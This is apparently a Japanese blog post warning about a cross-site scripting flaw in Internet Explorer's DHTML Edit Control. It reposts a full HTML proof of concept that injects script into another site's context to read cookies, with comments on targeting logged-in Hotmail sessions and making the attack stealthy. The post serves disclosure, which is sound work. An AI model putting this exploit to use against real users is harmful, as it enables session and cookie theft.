MSIE DHTML Edit Control Cross Site Scripting Vulnerability

パッチが出るまでしばらくIEは使えません。cookie盗まれ放題。DEC(DHTML Edit Control)にXSSがあったとのこと。影響大きいのでは?IEだけですむのかなぁ。

サンプルページ(greyhats)が現時点でアクセスできないので、以下にサンプルページのHTMLを一時的に表示しておきます。

<html>
<head>
<title>AbusiveParent</title>
</head>
<body onload="setTimeout('x.DOM.body.innerHTML=\'<b>Wait. Initializing vuln...</b>\'');setTimeout('main()',1000)">
<!--I appologize for my last vuln, which of course doesnt have any effect unless activex is enabled in the my computer zone (which I hope it isnt if your using sp2 ;) but perhaps this will make up for it-->
<object 
    id="x"
    classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
    width="598" 
    height="515" 
    align="middle"
>
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
<SCRIPT>
function shellscript()
{
window.name="poorchild";
open("http://google.com","poorchild");
/*
Yes, even cookies are transfered through the Dhtml Edit control. That means that
http://by22fd.bay22.hotmail.msn.com/cgi-bin/HoTMaiL?curmbox=F000000001
will work fine, as long as the victim is logged into hotmail of course.
Note: Only the script shown above will allow the edit control to navigate to a different page (afaik) so you must navigate to the page that actually accepts the cookies,
not one that redirects. Open("page","_self") will open the page in a new browser window and won't inject the javascript.
*/
}

function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
alert("Wait until page is loaded. In a stealth attack, this alert can be bypassed by a loop that reads the location.href of the dhtml edit control. Once an error is hit (permission denied) the inject script would be executed.");
//var myloc=x.DOM.location.href;
x.DOM.Script.execScript("alert('Javascript injected! \\n\\nLocation: ' + location.href + '\\n\\nCookie: ' + document.cookie)");
}
</SCRIPT>
</body>
</html>